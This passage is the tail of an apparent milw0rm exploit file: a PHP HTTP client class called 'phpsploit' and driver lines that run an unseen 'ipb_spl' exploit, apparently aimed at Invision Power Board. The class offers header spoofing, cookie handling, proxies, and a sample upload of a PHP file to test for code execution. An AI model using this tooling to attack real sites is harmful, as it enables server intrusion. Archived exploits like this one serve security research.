 * LICENSE:        GNU General Public License
 * ORIGINAL URL:   http://www.acid-root.new.fr/tools/03061230.txt
 * FILENAME:       phpsploitclass.php
 *
 * CONTACT:        gmdarkfig@gmail.com (french / english)
 * GREETZ:         Sparah, Ddx39
 *
 * DESCRIPTION:
 * The phpsploit is a class implementing a web user agent.
 * You can add cookies, headers, use a proxy server with (or without) a
 * basic authentification. It supports the GET and the POST method. It can
 * also be used like a browser with the cookiejar() function (which allow
 * a server to add several cookies for the next requests) and the
 * allowredirection() function (which allow the script to follow all
 * redirections sent by the server). It can return the content (or the
 * headers) of the request. Others useful functions can be used for debugging.
 * A manual is actually in development but to know how to use it, you can
 * read the comments.
 *
 * CHANGELOG:
 *
 * [2008-08-29] (2.1)
 *  * New: The showheader()/showcookie() functions can now return an array
 *  * Bug #3 fixed: Problem concerning some servers for the main function
 *
 * [2007-06-10] (2.0)
 *  * Code: Code optimization
 *  * New: Compatible with PHP 4 by default
 *
 * [2007-01-24] (1.2)
 *  * Bug #2 fixed: Problem concerning the getcookie() function ((|;))
 *  * New: multipart/form-data enctype is now supported 
 *
 * [2006-12-31] (1.1)
 *  * Bug #1 fixed: Problem concerning the allowredirection() function (chr(13) bug)
 *  * New: You can now call the getheader() / getcontent() function without parameters
 *
 * [2006-12-30] (1.0)
 *  * First version
 * 
 */

class phpsploit
{
	var $proxyhost;
	var $proxyport;
	var $host;
	var $path;
	var $port;
	var $method;
	var $url;
	var $packet;
	var $proxyuser;
	var $proxypass;
	var $header;
	var $cookie;
	var $data;
	var $boundary;
	var $allowredirection;
	var $last_redirection;
	var $cookiejar;
	var $recv;
	var $cookie_str;
	var $header_str;
	var $server_content;
	var $server_header;
	

	/**
	 * This function is called by the
	 * get()/post()/formdata() functions.
	 * You don't have to call it, this is
	 * the main function.
	 *
	 * @access private
	 * @return string $this-&gt;recv ServerResponse
	 * 
	 */
	function sock()
	{
		if(!empty($this-&gt;proxyhost) && !empty($this-&gt;proxyport))
		   $socket = @fsockopen($this-&gt;proxyhost,$this-&gt;proxyport);
		else
		   $socket = @fsockopen($this-&gt;host,$this-&gt;port);
	
		if(!$socket)
		   die("Error: Host seems down");
		
		if($this-&gt;method=='get')
		   $this-&gt;packet = 'GET '.$this-&gt;url." HTTP/1.1\r\n";
		   
		elseif($this-&gt;method=='post' or $this-&gt;method=='formdata')
		   $this-&gt;packet = 'POST '.$this-&gt;url." HTTP/1.1\r\n";
		   
		else
		   die("Error: Invalid method");
		
		if(!empty($this-&gt;proxyuser))
		   $this-&gt;packet .= 'Proxy-Authorization: Basic '.base64_encode($this-&gt;proxyuser.':'.$this-&gt;proxypass)."\r\n";
		
		if(!empty($this-&gt;header))
		   $this-&gt;packet .= $this-&gt;showheader();
		   
		if(!empty($this-&gt;cookie))
		   $this-&gt;packet .= 'Cookie: '.$this-&gt;showcookie()."\r\n";

		$this-&gt;packet .= 'Host: '.$this-&gt;host."\r\n";
		$this-&gt;packet .= "Connection: Close\r\n";
		
		if($this-&gt;method=='post')
		{
			$this-&gt;packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
			$this-&gt;packet .= 'Content-Length: '.strlen($this-&gt;data)."\r\n\r\n";
			$this-&gt;packet .= $this-&gt;data."\r\n";
		}
		elseif($this-&gt;method=='formdata')
		{
			$this-&gt;packet .= 'Content-Type: multipart/form-data; boundary='.str_repeat('-',27).$this-&gt;boundary."\r\n";
			$this-&gt;packet .= 'Content-Length: '.strlen($this-&gt;data)."\r\n\r\n";
			$this-&gt;packet .= $this-&gt;data;
		}

		$this-&gt;packet .= "\r\n";
		$this-&gt;recv = '';

		fputs($socket, $this-&gt;packet);

		while(!feof($socket))
		   $this-&gt;recv .= fgets($socket);

		fclose($socket);

		if($this-&gt;cookiejar)
		   $this-&gt;getcookie();

		if($this-&gt;allowredirection)
		   return $this-&gt;getredirection();
		else
		   return $this-&gt;recv;
	}
	

	/**
	 * This function allows you to add several
	 * cookies in the request.
	 * 
	 * @access  public
	 * @param   string cookn CookieName
	 * @param   string cookv CookieValue
	 * @example $this-&gt;addcookie('name','value')
	 * 
	 */
	function addcookie($cookn,$cookv)
	{
		if(!isset($this-&gt;cookie))
		   $this-&gt;cookie = array();

		$this-&gt;cookie[$cookn] = $cookv;
	}


	/**
	 * This function allows you to add several
	 * headers in the request.
	 *
	 * @access  public
	 * @param   string headern HeaderName
	 * @param   string headervalue Headervalue
	 * @example $this-&gt;addheader('Client-IP', '128.5.2.3')
	 * 
	 */
	function addheader($headern,$headervalue)
	{
		if(!isset($this-&gt;header))
		   $this-&gt;header = array();
		   
		$this-&gt;header[$headern] = $headervalue;
	}
	
	/**
	 * This function allows you to use an
	 * http proxy server. Several methods
	 * are supported.
	 * 
	 * @access  public
	 * @param   string proxy ProxyHost
	 * @param   integer proxyp ProxyPort
	 * @example $this-&gt;proxy('localhost',8118)
	 * @example $this-&gt;proxy('localhost:8118')
	 * 
	 */
	function proxy($proxy,$proxyp='')
	{
		if(empty($proxyp))
		{
			$proxarr = explode(':',$proxy);
			$this-&gt;proxyhost = $proxarr[0];
			$this-&gt;proxyport = (int)$proxarr[1];
		}
		else 
		{
			$this-&gt;proxyhost = $proxy;
			$this-&gt;proxyport = (int)$proxyp;
		}

		if($this-&gt;proxyport &gt; 65535)
		   die("Error: Invalid port number");
	}
	

	/**
	 * This function allows you to use an
	 * http proxy server which requires a
	 * basic authentification. Several
	 * methods are supported:
	 *
	 * @access  public
	 * @param   string proxyauth ProxyUser
	 * @param   string proxypass ProxyPass
	 * @example $this-&gt;proxyauth('user','pwd')
	 * @example $this-&gt;proxyauth('user:pwd');
	 * 
	 */
	function proxyauth($proxyauth,$proxypass='')
	{
		if(empty($proxypass))
		{
			$posvirg = strpos($proxyauth,':');
			$this-&gt;proxyuser = substr($proxyauth,0,$posvirg);
			$this-&gt;proxypass = substr($proxyauth,$posvirg+1);
		}
		else
		{
			$this-&gt;proxyuser = $proxyauth;
			$this-&gt;proxypass = $proxypass;
		}
	}


	/**
	 * This function allows you to set
	 * the 'User-Agent' header.
	 * 
	 * @access  public
	 * @param   string useragent Agent
	 * @example $this-&gt;agent('Firefox')
	 * 
	 */
	function agent($useragent)
	{
		$this-&gt;addheader('User-Agent',$useragent);
	}

	
	/**
	 * This function returns the headers
	 * which will be in the next request.
	 * 
	 * @access  public
	 * @return  string $this-&gt;header_str Headers
	 * @return  array  $this-&gt;head Headers
	 * @example $this-&gt;showheader()
	 * @example $this-&gt;showheader(1)
	 * 
	 */
	function showheader($array='')
	{
		$this-&gt;header_str = '';
		
		if(!isset($this-&gt;header))
		   return;
		   
		if(!empty($array))
			return $this-&gt;header;
			
		foreach($this-&gt;header as $name =&gt; $value)
		   $this-&gt;header_str .= $name.': '.$value."\r\n";
		   
		return $this-&gt;header_str;
	}

	
	/**
	 * This function returns the cookies
	 * which will be in the next request.
	 * 
	 * @access  public
	 * @return  string $this-&gt;cookie_str Cookies
	 * @return  array  $this-&gt;cookie Cookies
	 * @example $this-&gt;showcookie()
	 * @example $this-&gt;showcookie(1)
	 * 
	 */
	function showcookie($array='')
	{
		if(!isset($this-&gt;cookie))
		   return;
		 
		if(!empty($array))
			return $this-&gt;cookie;
		
		$this-&gt;cookie_str = '';
		
		foreach($this-&gt;cookie as $name =&gt; $value)
		   $this-&gt;cookie_str .= $name.'='.$value.'; ';

		return $this-&gt;cookie_str;
	}


	/**
	 * This function returns the last
	 * formed http request.
	 * 
	 * @access  public
	 * @return  string $this-&gt;packet HttpPacket
	 * @example $this-&gt;showlastrequest()
	 * 
	 */
	function showlastrequest()
	{
		if(!isset($this-&gt;packet))
		   return;
		else
		   return $this-&gt;packet;
	}


	/**
	 * This function sends the formed
	 * http packet with the GET method.
	 * 
	 * @access  public
	 * @param   string url Url
	 * @return  string $this-&gt;sock()
	 * @example $this-&gt;get('localhost/index.php?var=x')
	 * @example $this-&gt;get('http://localhost:88/tst.php')
	 * 
	 */
	function get($url)
	{
		$this-&gt;target($url);
		$this-&gt;method = 'get';
		return $this-&gt;sock();
	}

	
	/**
	 * This function sends the formed
	 * http packet with the POST method.
	 *
	 * @access  public
	 * @param   string url  Url
	 * @param   string data PostData
	 * @return  string $this-&gt;sock()
	 * @example $this-&gt;post('http://localhost/','helo=x')
	 * 
	 */	
	function post($url,$data)
	{
		$this-&gt;target($url);
		$this-&gt;method = 'post';
		$this-&gt;data = $data;
		return $this-&gt;sock();
	}
	

	/**
	 * This function sends the formed http
	 * packet with the POST method using
	 * the multipart/form-data enctype.
	 * 
	 * @access  public
	 * @param   array array FormDataArray
	 * @return  string $this-&gt;sock()
	 * @example $formdata = array(
	 *                      frmdt_url =&gt; 'http://localhost/upload.php',
	 *                      frmdt_boundary =&gt; '123456', # Optional
	 *                      'var' =&gt; 'example',
	 *                      'file' =&gt; array(
	 *                                frmdt_type =&gt; 'image/gif',  # Optional
	 *                                frmdt_transfert =&gt; 'binary' # Optional
	 *                                frmdt_filename =&gt; 'hello.php,
	 *                                frmdt_content =&gt; '&lt;?php echo 1; ?&gt;'));
	 *          $this-&gt;formdata($formdata);
	 * 
	 */
	function formdata($array)
	{
		$this-&gt;target($array[frmdt_url]);
		$this-&gt;method = 'formdata';
		$this-&gt;data = '';
		
		if(!isset($array[frmdt_boundary]))
		   $this-&gt;boundary = 'phpsploit';
		else
		   $this-&gt;boundary = $array[frmdt_boundary];

		foreach($array as $key =&gt; $value)
		{
			if(!preg_match('#^frmdt_(boundary|url)#',$key))
			{
				$this-&gt;data .= str_repeat('-',29).$this-&gt;boundary."\r\n";
				$this-&gt;data .= 'Content-Disposition: form-data; name="'.$key.'";';
				
				if(!is_array($value))
				{
					$this-&gt;data .= "\r\n\r\n".$value."\r\n";
				}
				else
				{
					$this-&gt;data .= ' filename="'.$array[$key][frmdt_filename]."\";\r\n";

					if(isset($array[$key][frmdt_type]))
					   $this-&gt;data .= 'Content-Type: '.$array[$key][frmdt_type]."\r\n";

					if(isset($array[$key][frmdt_transfert]))
					   $this-&gt;data .= 'Content-Transfer-Encoding: '.$array[$key][frmdt_transfert]."\r\n";

					$this-&gt;data .= "\r\n".$array[$key][frmdt_content]."\r\n";
				}
			}
		}

		$this-&gt;data .= str_repeat('-',29).$this-&gt;boundary."--\r\n";
		return $this-&gt;sock();
	}

	
	/**
	 * This function returns the content
	 * of the server response, without
	 * the headers.
	 * 
	 * @access  public
	 * @param   string code ServerResponse
	 * @return  string $this-&gt;server_content
	 * @example $this-&gt;getcontent()
	 * @example $this-&gt;getcontent($this-&gt;get('http://localhost/'))
	 * 
	 */
	function getcontent($code='')
	{
		if(empty($code))
		   $code = $this-&gt;recv;

		$code = explode("\r\n\r\n",$code);
		$this-&gt;server_content = '';
		
		for($i=1;$i&lt;count($code);$i++)
		   $this-&gt;server_content .= $code[$i];

		return $this-&gt;server_content;
	}

	
	/**
	 * This function returns the headers
	 * of the server response, without
	 * the content.
	 * 
	 * @access  public
	 * @param   string code ServerResponse
	 * @return  string $this-&gt;server_header
	 * @example $this-&gt;getcontent()
	 * @example $this-&gt;getcontent($this-&gt;post('http://localhost/','1=2'))
	 * 
	 */
	function getheader($code='')
	{
		if(empty($code))
		   $code = $this-&gt;recv;

		$code = explode("\r\n\r\n",$code);
		$this-&gt;server_header = $code[0];
		
		return $this-&gt;server_header;
	}

	
	/**
	 * This function is called by the
	 * cookiejar() function. It adds the
	 * value of the "Set-Cookie" header
	 * in the "Cookie" header for the
	 * next request. You don't have to
	 * call it.
	 * 
	 * @access private
	 * @param  string code ServerResponse
	 * 
	 */
	function getcookie()
	{
		foreach(explode("\r\n",$this-&gt;getheader()) as $header)
		{
			if(preg_match('/set-cookie/i',$header))
			{
				$fequal = strpos($header,'=');
				$fvirgu = strpos($header,';');
				
				// 12=strlen('set-cookie: ')
				$cname  = substr($header,12,$fequal-12);
				$cvalu  = substr($header,$fequal+1,$fvirgu-(strlen($cname)+12+1));
				
				$this-&gt;cookie[trim($cname)] = trim($cvalu);
			}
		}
	}


	/**
	 * This function is called by the
	 * get()/post() functions. You
	 * don't have to call it.
	 *
	 * @access  private
	 * @param   string urltarg Url
	 * @example $this-&gt;target('http://localhost/')
	 * 
	 */
	function target($urltarg)
	{
		if(!ereg('^http://',$urltarg))
		   $urltarg = 'http://'.$urltarg;
		
		$urlarr = parse_url($urltarg);
		
		if(!isset($urlarr['path']) || empty($urlarr['path']))
		   die("Error: No path precised");
		
		$this-&gt;url  = $urlarr['path'];
		
		if(isset($urlarr['query']))
		   $this-&gt;url .= '?'.$urlarr['query'];
		
		$this-&gt;port = !empty($urlarr['port']) ? $urlarr['port'] : 80;
		$this-&gt;host = $urlarr['host'];
		
		if($this-&gt;port != '80')
		   $this-&gt;host .= ':'.$this-&gt;port;

		$this-&gt;path = substr($urlarr['path'],0,strrpos($urlarr['path'],'/')+1);
		
		if($this-&gt;port &gt; 65535)
		   die("Error: Invalid port number");
	}
	
	
	/**
	 * If you call this function,
	 * the script will extract all
	 * 'Set-Cookie' headers values
	 * and it will automatically add
	 * them into the 'Cookie' header
	 * for all next requests.
	 *
	 * @access  public
	 * @param   integer code 1(enabled) 0(disabled)
	 * @example $this-&gt;cookiejar(0)
	 * @example $this-&gt;cookiejar(1)
	 * 
	 */
	function cookiejar($code)
	{
		if($code=='0')
		   $this-&gt;cookiejar=FALSE;

		elseif($code=='1')
		   $this-&gt;cookiejar=TRUE;
	}


	/**
	 * If you call this function,
	 * the script will follow all
	 * redirections sent by the server.
	 * 
	 * @access  public
	 * @param   integer code 1(enabled) 0(disabled)
	 * @example $this-&gt;allowredirection(0)
	 * @example $this-&gt;allowredirection(1)
	 * 
	 */
	function allowredirection($code)
	{
		if($code=='0')
		   $this-&gt;allowredirection=FALSE;
		   
		elseif($code=='1')
		   $this-&gt;allowredirection=TRUE;
	}

	
	/**
	 * This function is called if
	 * allowredirection() is enabled.
	 * You don't have to call it.
	 *
	 * @access private
	 * @return string $this-&gt;get('http://'.$this-&gt;host.$this-&gt;path.$this-&gt;last_redirection)
	 * @return string $this-&gt;get($this-&gt;last_redirection)
	 * @return string $this-&gt;recv;
	 * 
	 */
	function getredirection()
	{
		if(preg_match('/(location|content-location|uri): (.*)/i',$this-&gt;getheader(),$codearr))
		{
			$this-&gt;last_redirection = trim($codearr[2]);
			
			if(!ereg('://',$this-&gt;last_redirection))
			   return $this-&gt;get('http://'.$this-&gt;host.$this-&gt;path.$this-&gt;last_redirection);

			else
			   return $this-&gt;get($this-&gt;last_redirection);
		}
		else
		   return $this-&gt;recv;
	}


	/**
	 * This function allows you
	 * to reset some parameters.
	 * 
	 * @access  public
	 * @param   string func Param
	 * @example $this-&gt;reset('header')
	 * @example $this-&gt;reset('cookie')
	 * @example $this-&gt;reset()
	 * 
	 */
	function reset($func='')
	{
		switch($func)
		{
			case 'header':
			$this-&gt;header = array();
			break;
				
			case 'cookie':
			$this-&gt;cookie = array();
			break;
				
			default:
			$this-&gt;cookiejar = '';
			$this-&gt;header = array();
			$this-&gt;cookie = array();
			$this-&gt;allowredirection = '';
			break;
		}
	}
}

$web = new phpsploit;
$web-&gt;cookiejar(1);
$web-&gt;agent('Mozilla Firefox');

$ipb = new ipb_spl;
$ipb-&gt;web =& $web;
$ipb-&gt;main();

?&gt;

# milw0rm.com [2008-08-29]